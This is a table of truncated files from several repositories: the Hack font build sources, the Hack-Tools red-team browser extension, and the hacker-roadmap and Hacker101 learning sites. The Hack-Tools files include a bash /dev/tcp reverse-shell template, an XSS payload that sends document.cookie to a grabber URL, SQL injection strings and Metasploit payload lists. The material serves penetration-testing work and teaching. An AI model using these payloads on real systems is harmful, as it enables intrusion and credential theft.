language stringlengths 0 24 | filename stringlengths 9 214 | code stringlengths 99 9.93M |
|---|---|---|
Hack/source/Hack-Regular.ufo/lib.plist | <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>public.glyphOrder</key>
<array>
<string>.notdef</string>
<string>NULL</string>
<string>CR</string>
<string>space</string>
<string>Ac... | |
Hack/source/Hack-Regular.ufo/metainfo.plist | <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>creator</key>
<string>com.schriftgestaltung.GlyphsUFOExport</string>
<key>formatVersion</key>
<integer>2</integer>
</dict>
</plist> | |
Hack/source/Hack-Regular.ufo/glyphs/contents.plist | <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>.notdef</key>
<string>_notdef.glif</string>
<key>A</key>
<string>A_.glif</string>
<key>AE</key>
<string>A_E_.glif</string>
<key>... | |
Hack/source/subset-lib/lib-bold.plist | <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>com.schriftgestaltung.Keep Glyphs</key>
<array>
<string>.notdef</string>
<string>NULL</string>
<string>CR</string>
<string>space</stri... | |
Hack/source/subset-lib/lib-bolditalic.plist | <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>com.schriftgestaltung.Keep Glyphs</key>
<array>
<string>.notdef</string>
<string>NULL</string>
<string>CR</string>
<string>space</stri... | |
Hack/source/subset-lib/lib-italic.plist | <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>com.schriftgestaltung.Keep Glyphs</key>
<array>
<string>.notdef</string>
<string>NULL</string>
<string>CR</string>
<string>space</stri... | |
Hack/source/subset-lib/lib-regular.plist | <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>com.schriftgestaltung.Keep Glyphs</key>
<array>
<string>.notdef</string>
<string>NULL</string>
<string>CR</string>
<string>space</stri... | |
Python | Hack/tools/scripts/checksum/checksum.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#----------------------------------------------------------------------------------------------------------
# checksum.py
# A SHA1 hash checksum list generator for fonts and fontTools
# XML dumps of font OpenType table data + checksum testing
# script
#
# Copyright 201... |
Shell Script | Hack/tools/scripts/css/css-build.sh | #!/bin/sh
#######################################
# Copyright 2018 Christopher Simpkins
# MIT License
#######################################
# This script builds the Hack web font CSS files from CSS file templates
# by adding a git commit sha1 stamp to the URL string
# Dependency:
# Ink - https://github.com/chris... |
Shell Script | Hack/tools/scripts/diff/ttdiff.sh | #!/bin/bash
# Copyright 2018 Source Foundry Authors
# MIT License
# compare fonts with ttx
ttdiff () {
if [ "$#" -lt 2 ]
then
echo "Usage: ttdiff FONT1.ttf FONT2.ttf [tables ...]"
return 1
fi
first="$1"
if [ ! -f "$first" ]; then
echo "File $first not found"
return ... |
Shell Script | Hack/tools/scripts/install/ttfautohint-build.sh | #!/bin/sh
# shellcheck disable=SC2103
# This script builds a stand-alone binary for the command line version of
# ttfautohint, downloading any necessary libraries.
#
# Version 2018-Feb-22.
# The MIT License (MIT)
# Copyright (c) 2018 Werner Lemberg
# Permission is hereby granted, free of charge, to any person obtain... |
Hack-Tools/.babelrc | {
"presets": [
[
"@babel/preset-env",
{
"modules": false
}
],
"@babel/preset-react"
],
"plugins": [
"react-hot-loader/babel"
]
} | |
Hack-Tools/.gitignore | /.git
/node_modules
/dist
.DS_Store
yarn.lock
package-lock.json
yarn-error.log
.scannerwork
.vscode
.idea
.github
pnpm-lock.yaml
bundle*.zip | |
JSON | Hack-Tools/package.json | {
"name": "hack-tools",
"version": "1.0.0",
"description": "The all in one Red team browser extension for web pentesters",
"main": "index.js",
"scripts": {
"start": "webpack --watch",
"build": "webpack --mode production && rm -f ./dist/*.map",
"watch": "webpack --watch",
... |
JSON | Hack-Tools/tsconfig.json | {
"compilerOptions": {
"jsx": "react",
"module": "commonjs",
"allowSyntheticDefaultImports": true,
"noImplicitAny": false,
"outDir": "./dist/",
"preserveConstEnums": true,
"removeComments": true,
"esModuleInterop": true,
"baseUrl": "src",
"sourceMap": true,
"moduleResolutio... |
JavaScript | Hack-Tools/webpack.config.js | const webpack = require('webpack');
const path = require('path');
const HtmlWebpackPlugin = require('html-webpack-plugin');
const { CleanWebpackPlugin } = require('clean-webpack-plugin');
const CopyWebpackPlugin = require('copy-webpack-plugin');
const ReactRefreshWebpackPlugin = require('@pmmmwh/react-refresh-webpack-p... |
Hack-Tools/src/App.tsx | import React from 'react';
import ReactDOM from 'react-dom';
import { Router } from 'react-chrome-extension-router';
import { FloatButton } from 'antd';
import { QueryClientProvider, QueryClient } from 'react-query';
import LayoutApp from './components/LayoutApp';
import ReverseShell from './components/linux/ReverseShe... | |
HTML | Hack-Tools/src/index.html | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>Hack-Tools</title>
</head>
<body>
<div id="app"></div>
</body>
</html> |
JSON | Hack-Tools/src/manifest.json | {
"name": "Hack-Tools",
"version": "0.5.0",
"description": "The all in one Red team extension for web pentester",
"action": {
"default_title": "Hack-Tools",
"default_popup": "index.html",
"default_icon": {
"16": "./src/assets/img/icons/get_started16.png",
... |
Hack-Tools/src/assets/css/style.css | .logo:hover {
cursor: pointer;
animation: jelly 0.5s;
}
.logo {
padding-left: 17px;
padding-top: 14px;
margin-bottom: 10px;
}
@keyframes jelly {
0%,
100% {
transform: scale(1, 1);
}
25% {
transform: scale(0.9, 1.1);
}
50% {
transform: scale(1.1, 0... | |
JSON | Hack-Tools/src/assets/data/Encoder.json | [
{ "value": "cmd/echo" },
{ "value": "cmd/generic_sh" },
{ "value": "cmd/ifs" },
{ "value": "cmd/perl" },
{ "value": "cmd/powershell_base64" },
{ "value": "cmd/printf_php_mq" },
{ "value": "generic/eicar" },
{ "value": "generic/none" },
{ "value": "mipsbe/byte_xori" },
{ "value": "mipsbe/longxor" },
{ "valu... |
JSON | Hack-Tools/src/assets/data/Format.json | [
{ "value": "asp" },
{ "value": "aspx" },
{ "value": "aspx-exe" },
{ "value": "axis2" },
{ "value": "bash" },
{ "value": "c" },
{ "value": "csharp" },
{ "value": "dll" },
{ "value": "dw" },
{ "value": "dword" },
{ "value": "elf" },
{ "value": "elf-so" },
{ "value": "exe" },
{ "value": "exe-only" },
{ "v... |
JSON | Hack-Tools/src/assets/data/Payloads.json | [
{ "value": "aix/ppc/shell_bind_tcp" },
{ "value": "aix/ppc/shell_find_port" },
{ "value": "aix/ppc/shell_interact" },
{ "value": "aix/ppc/shell_reverse_tcp" },
{ "value": "android/meterpreter/reverse_http" },
{ "value": "android/meterpreter/reverse_https" },
{ "value": "android/meterpreter/reverse_tcp" },
{ "... |
JSON | Hack-Tools/src/assets/data/Platform.json | [
{ "value": "aix" },
{ "value": "android" },
{ "value": "apple_ios" },
{ "value": "bsd" },
{ "value": "bsdi" },
{ "value": "cisco" },
{ "value": "firefox" },
{ "value": "freebsd" },
{ "value": "hardware" },
{ "value": "hpux" },
{ "value": "irix" },
{ "value": "java" },
{ "value": "javascript" },
{ "value... |
JSON | Hack-Tools/src/assets/data/RevShell.json | [
{
"name": "Bash -i",
"command": "{shell} -i >& /dev/tcp/${values.ip}/${values.port} 0>&1",
"tags": [
"linux",
"mac"
]
},
{
"name": "Bash 196",
"command": "0<&196;exec 196<>/dev/tcp/${values.ip}/${values.port}; {shell} <&196 >&196 2>&1... |
JavaScript | Hack-Tools/src/assets/img/icons/iconfont.js | !function(t){var c,l,h,a,o,v='<svg><symbol id="icon-Encode-File" viewBox="0 0 1024 1024"><path d="M409.6 853.333333H34.133333c-10.24 0-17.066667-6.826667-17.066666-17.066666v-546.133334c0-3.413333 3.413333-10.24 3.413333-13.653333l273.066667-273.066667c3.413333 0 10.24-3.413333 13.653333-3.413333h273.066667c10.24 0 17.... |
Hack-Tools/src/components/AboutUs.tsx | import React from 'react';
import { Typography, Divider } from 'antd';
const { Title, Paragraph, Link } = Typography;
export default function AboutUs () {
return (
<div>
<Title
level={2}
style={{
fontWeight: 'bold',
margin... | |
Hack-Tools/src/components/LayoutApp.tsx | import React, { useEffect } from 'react';
import { Layout, Menu, Typography, theme, Button, Select, ConfigProvider, Switch } from 'antd';
import { CopyrightCircleOutlined, FullscreenOutlined, ArrowsAltOutlined } from '@ant-design/icons';
import { createFromIconfontCN } from '@ant-design/icons';
import { goTo } from 're... | |
Hack-Tools/src/components/encoding/DataEncoding.tsx | import React, { useState } from 'react';
import { Button, Input, Typography, message, Divider, Menu, Dropdown } from 'antd';
import { CopyOutlined, createFromIconfontCN, ClearOutlined, DownOutlined } from '@ant-design/icons';
import Clipboard from 'react-clipboard.js';
import escape_quotes from 'escape-quotes';
const ... | |
Hack-Tools/src/components/encoding/Hashing.tsx | import React, { useState } from 'react';
import { Button, Input, Typography, Menu, Dropdown, Divider, message } from 'antd';
import { CopyOutlined, DownOutlined, ArrowsAltOutlined, createFromIconfontCN } from '@ant-design/icons';
import MD5 from 'crypto-js/md5';
import SHA1 from 'crypto-js/sha1';
import SHA256 from 'cr... | |
Hack-Tools/src/components/encoding/HexEncode.tsx | import React, { useState } from 'react';
import { Button, Input, Typography, message, Divider } from 'antd';
import { CopyOutlined, createFromIconfontCN, ClearOutlined } from '@ant-design/icons';
import Clipboard from 'react-clipboard.js';
const { Title, Paragraph } = Typography;
const IconFont = createFromIconfontCN(... | |
Hack-Tools/src/components/encoding/URLEncode.tsx | import React, { useState } from 'react';
import { Button, Input, Typography, message, Divider } from 'antd';
import { CopyOutlined, createFromIconfontCN, ClearOutlined } from '@ant-design/icons';
import Clipboard from 'react-clipboard.js';
import { escape, unescape } from 'querystring';
const { Title, Paragraph } = Ty... | |
Hack-Tools/src/components/file_transfer/File_transfer.tsx | import React from 'react';
import PersistedState from 'use-persisted-state';
import { Typography, Row, Col, Divider, Input, Space } from 'antd';
import { WifiOutlined, createFromIconfontCN, FolderOutlined, FileDoneOutlined } from '@ant-design/icons';
import { Ipv4TcpCacheState } from "components/types/Ipv4TcpCacheState... | |
Hack-Tools/src/components/file_transfer/ObfuscatedFiles.tsx | import React, { useState } from 'react';
import PersistedState from 'use-persisted-state';
import { Button, Input, Typography, message, Divider, Menu, Dropdown, Space } from 'antd';
import { CopyOutlined, createFromIconfontCN, ClearOutlined, DownOutlined, FileTextOutlined } from '@ant-design/icons';
import { Obfuscated... | |
Hack-Tools/src/components/http_utils/HTTP-Utils.tsx | import React, { useState } from 'react';
import {
Button,
Typography,
Row,
Col,
Input,
Select,
Divider,
Tag,
message,
Descriptions,
Modal,
Tabs,
Alert
} from 'antd';
import { SendOutlined, FullscreenOutlined, ArrowsAltOutlined, DeleteOutlined } from '@ant-design/icons... | |
Hack-Tools/src/components/linux/LinuxCommands.tsx | import React from 'react';
import { Typography, Divider, Button, Collapse } from 'antd';
import { ArrowsAltOutlined } from '@ant-design/icons';
const { Title, Paragraph, Text } = Typography;
const { Panel } = Collapse;
export default function LinuxCommands () {
const Suid = [
{ title: 'find / -user root -... | |
Hack-Tools/src/components/linux/MSFBuilder.tsx | import React from 'react';
import { Input, Typography, Row, Divider, Select, Form, Col, Collapse } from 'antd';
import PersistedState from 'use-persisted-state';
import { MSFBuilder } from 'components/types/MSFBuilder';
const { Title, Paragraph } = Typography;
const MSFBuilder = () => {
// LocalStorage stuff
... | |
Hack-Tools/src/components/linux/PowershellCommands.tsx | import React from 'react';
import { Typography, Divider, Button, message } from 'antd';
import SyntaxHighlighter from 'react-syntax-highlighter';
import { vs2015 } from 'react-syntax-highlighter/dist/esm/styles/hljs';
import Clipboard from 'react-clipboard.js';
import { CopyOutlined } from '@ant-design/icons';
const {... | |
Hack-Tools/src/components/linux/ReverseShell.tsx | import React, { useRef, useState } from 'react';
import { message, Typography, Row, Col, Input, Table, Tag, Select, Form, InputRef, Button, Space, Dropdown } from 'antd';
import type { ColumnsType, TableProps } from 'antd/es/table';
import { SearchOutlined, WifiOutlined, createFromIconfontCN } from '@ant-design/icons';... | |
Hack-Tools/src/components/linux/TtySpawnShell.tsx | import React from 'react';
import { Typography, Divider, Space } from 'antd';
const { Title, Paragraph, Text } = Typography;
export default function TTY () {
return (
<div>
<Title level={2} style={{ fontWeight: 'bold', margin: 15 }}>
TTY Spawn Shell
</Title>
... | |
Hack-Tools/src/components/notepad/Notepad.tsx | import React from 'react';
import MDEditor from '@uiw/react-md-editor';
import PersistedState from 'use-persisted-state';
const NOTEPAD = () => {
const [ value, setValue ] = PersistedState<string | string>( 'notepad' )( '' );
return (
<div className='container'>
<MDEditor
t... | |
Hack-Tools/src/components/rss/BugsCX.tsx | import React from 'react';
import { Typography, Empty, Spin, Button, List, Tag } from 'antd';
import { PageHeader } from '@ant-design/pro-layout';
import { goTo } from 'react-chrome-extension-router';
import { useQuery } from 'react-query';
import CxsecurityChoose from './CxsecurityChoose';
const { Title } = Typograph... | |
Hack-Tools/src/components/rss/Cisco.tsx | import React from 'react';
import { Typography, Empty, Spin, Button, List, Tag } from 'antd';
import { PageHeader } from '@ant-design/pro-layout';
import { goTo } from 'react-chrome-extension-router';
import { useQuery } from 'react-query';
import FeedRSS from './FeedRSS';
const { Title } = Typography;
const fetchApi... | |
Hack-Tools/src/components/rss/CVESearch.tsx | import React, { useState } from 'react';
import { Typography, Empty, Spin, Button, Tag, Descriptions, Input, List, Divider, Result } from 'antd';
import { PageHeader } from '@ant-design/pro-layout';
import { CloseCircleOutlined } from '@ant-design/icons';
import { goTo } from 'react-chrome-extension-router';
import { u... | |
Hack-Tools/src/components/rss/CxsecurityChoose.tsx | import React from 'react';
import { Typography, Card, Col, Row, Button } from 'antd';
import { PageHeader } from '@ant-design/pro-layout';
import { goTo } from 'react-chrome-extension-router';
import { GithubOutlined } from '@ant-design/icons';
import FeedRSS from './FeedRSS';
import ExploitCX from './ExploitCX';
impor... | |
Hack-Tools/src/components/rss/DorksCX.tsx | import React from 'react';
import { Typography, Empty, Spin, Button, List, Tag } from 'antd';
import { PageHeader } from '@ant-design/pro-layout';
import { goTo } from 'react-chrome-extension-router';
import { useQuery } from 'react-query';
import CxsecurityChoose from './CxsecurityChoose';
const { Title } = Typograph... | |
Hack-Tools/src/components/rss/ExploitCX.tsx | import React from 'react';
import { Typography, Empty, Spin, Button, List, Tag } from 'antd';
import { PageHeader } from '@ant-design/pro-layout';
import { goTo } from 'react-chrome-extension-router';
import { useQuery } from 'react-query';
import CxsecurityChoose from './CxsecurityChoose';
const { Title } = Typograph... | |
Hack-Tools/src/components/rss/ExploitDB.tsx | import React from 'react';
import { Typography, Empty, Spin, Button, List, Tag } from 'antd';
import { PageHeader } from '@ant-design/pro-layout';
import { goTo } from 'react-chrome-extension-router';
import { useQuery } from 'react-query';
import FeedRSS from './FeedRSS';
const { Title } = Typography;
const fetchApi... | |
Hack-Tools/src/components/rss/FeedRSS.tsx | import React from 'react';
import { Typography, Card, Col, Row, Avatar, Tooltip, Button } from 'antd';
import { goTo } from 'react-chrome-extension-router';
import { LinkOutlined, EyeOutlined, GithubOutlined } from '@ant-design/icons';
import ExploitDB from './ExploitDB';
import Cisco from './Cisco';
import cve from '.... | |
Hack-Tools/src/components/types/Ipv4TcpCacheState.ts | export type Ipv4TcpCacheState = {
ip: string | number;
port: string | number;
output_file_name?: string | number;
target_file_name?: string | number;
shell?: string | number;
}; | |
Hack-Tools/src/components/types/MSFBuilder.ts | export type MSFBuilder = {
Payload: string;
LHOST: string;
LPORT: string;
Encoder: string;
EncoderIterations: string;
Platform: string;
Arch: string;
NOP: string;
BadCharacters: string;
Format: string;
Outfile: string;
}; | |
Hack-Tools/src/components/web/LFI.tsx | import React from 'react';
import { Button, message, Typography, Divider } from 'antd';
import { CopyOutlined, LinkOutlined } from '@ant-design/icons';
import Clipboard from 'react-clipboard.js';
const { Title, Paragraph, Text } = Typography;
export default function LFI () {
const successInfoReverseShell = () => ... | |
Hack-Tools/src/components/web/PhpReverseShell.tsx | import React from 'react';
import PersistedState from 'use-persisted-state';
import { Input, Button, message, Typography, Row, Col, Divider, Collapse } from 'antd';
import {
CopyOutlined,
WifiOutlined,
DownloadOutlined,
ArrowsAltOutlined,
createFromIconfontCN
} from '@ant-design/icons';
import Clipb... | |
Hack-Tools/src/components/web/SqlInjection.tsx | import React from 'react';
import { Typography, Divider } from 'antd';
const { Title, Paragraph, Text, Link } = Typography;
export default function SQLi () {
const DbColumnNumber = [
{
db_type: 'MySQL/MSSQL/PGSQL',
title: "'UNION SELECT NULL,NULL,NULL -- -"
},
{
... | |
Hack-Tools/src/components/web/XSS.tsx | import React from 'react';
import { Typography, Divider } from 'antd';
const { Title, Paragraph, Text } = Typography;
export default function XSS () {
const DataGrabber = [
{
title: "<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>"
},
{
... | |
JavaScript | Hack-Tools/src/devtools/devtools.js | navigator.userAgent.indexOf('Firefox') != -1 &&
browser.devtools.panels.create('HackTools', 'get_started16.png', 'index.html');
navigator.userAgent.indexOf('Chrome') != -1 &&
chrome.devtools.panels.create(
'HackTools', // title for the panel tab
null, // path to an icon
'index.html', // html page which is go... |
Markdown | hacker-roadmap/CONTRIBUTING.md | # Contributing
Before contributing or comment, please note that I am not a professional infosec or pen tester. I am just a student who want to learn and teach to others. Other contributors might be students as well, so be patient and indulgent with everyone. Do not forget that the main goal here is to write about ethi... |
hacker-roadmap/LICENSE | MIT License
Copyright (c) 2018 Raphael Cerveaux
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, ... | |
Markdown | hacker-roadmap/PULL_REQUEST_TEMPLATE.md | **Content Update :** Yes|No
**Related Content :** Guide|Tools
*Explain your changes here. Please read CONTRIBUTING.md before creating pull requests.* |
Markdown | hacker-roadmap/README.md | <p align="center">
<img src="https://i.imgur.com/VeEYEkT.png" alt="Hacker roadmap" /><br>
</p>
This repository is an overview of what you need to learn penetration testing and a collection of hacking tools, resources and references to practice ethical hacking. Most of the tools are UNIX compatible, free and open s... |
Markdown | hacker-roadmap/.github/ISSUE_TEMPLATE/improvement-request.md | ---
name: Improvement request
about: Suggest an idea for this project
title: ''
labels: ''
assignees: ''
---
(Please read CONTRIBUTING.md before posting issues)
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is.
**Describe the solution you'd li... |
Markdown | hacker-roadmap/.github/ISSUE_TEMPLATE/submit-a-general-issue.md | ---
name: Submit a general issue
about: Default template
title: ''
labels: ''
assignees: ''
---
**Related content :** Guide|Tools
**Issue with the content :** Yes|No
*Your comments here. Please read CONTRIBUTING.md before posting issues.* |
HTML | hacker101/404.html | ---
layout: default
---
<div class="d-flex h-100 align-items-center">
<div class="container text-center">
<h1>404</h1>
<p><strong>Page not found :(</strong></p>
<p>The requested page could not be found.</p>
</div>
</div> |
Markdown | hacker101/announcements.md | ---
layout: page
title: Announcements
---
# Hacky Holidays 2021!

The Grinch has gone hi-tech this year with the intentions of ruining the holidays and we need you to infiltrate his network and take him down!
For the next twelve days, starting at 12pm PT on Friday, December 1... |
HTML | hacker101/discord.html | <meta http-equiv="refresh" content="0; URL='https://discord.gg/32ZNZVN'" />
Redirecting to Discord. If you're not automatically redirected, <a href="https://discord.gg/32ZNZVN">click here</a>. |
Markdown | hacker101/index.md | ---
layout: default
title: Home
---
<div class="container">
<div class="row">
<div class="col-md-6 py-4 align-self-center">
<h1>
LEARN TO HACK
</h1>
<p class="lead my-3">
Hacker101 is a free class for web security. Whether you’re a
programmer with an interest in bu... |
hacker101/LICENSE | Copyright © 2020 HackerOne Inc.
This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License:
Attribution-NonCommercial-ShareAlike 4.0 International
=======================================================================
Creative Commons Corporation ("Creative Commons... | |
Markdown | hacker101/README.md | # Hacker101
[Hacker101](https://www.hacker101.com/) is a free class for web security.
Whether you're a programmer with an interest in bug bounties or a seasoned
security professional, Hacker101 has something to teach you.
## Getting Started
### Prerequisites
- Ruby
- Suggestion: use [`rbenv`](https://github.com/r... |
Markdown | hacker101/resources.md | ---
layout: page
title: Resources
---
<ul>
{% for resource in site.resources %}
<li>
<a href="/resources#{{ resource.title | url_encode }}">{{ resource.title }}</a>
</li>
{% endfor %}
</ul>
---
{% for resource in site.resources %}
<h2 id="{{ resource.title | url_encode }}">{{ resource.title }}</h... |
Markdown | hacker101/start-here.md | ---
layout: page
title: Getting Started
sidebar:
- title: Report Writing, Communication Tips, and Community Guidelines
links:
- text: "Understanding HackerOne's Code of Conduct"
url: /resources/articles/code_of_conduct
- text: "How to Write a Good Report and Use the CVSS Calculator"
ur... |
Shell Script | hacker101/update_bootstrap.sh | #! /bin/sh
# A useful script to download the latest version of bootstrap and jquery
rm -rf node_modules package-lock.json
npm install bootstrap@4 jquery@3
rm -rf _sass/bootstrap
mkdir -p _sass/bootstrap
cp -r node_modules/bootstrap/scss/* _sass/bootstrap
touch _sass/bootstrap/__DO_NOT_MODIFY
rm -rf assets/javascrip... |
Markdown | hacker101/videos.md | ---
layout: page
title: Video Lessons
sidebar:
- title: "Learning Tracks"
links:
- text: "Hacker101 for Newcomers"
url: /playlists/newcomers
- text: "Burp Suite"
url: /playlists/burp_suite
- text: "Pentest Series"
url: /playlists/pentesting_series
- text: "Web Hacki... |
YAML | hacker101/_config.yml | title: Hacker101
email: support@hackerone.com
description: >-
Hacker101 is a free class for web security. Whether you're a programmer with
an interest in bug bounties or a seasoned security professional, Hacker101
has something to teach you.
author:
name: HackerOne
twitter: Hacker0x01
google_analytics: UA-499... |
hacker101/assets/.DS_Store |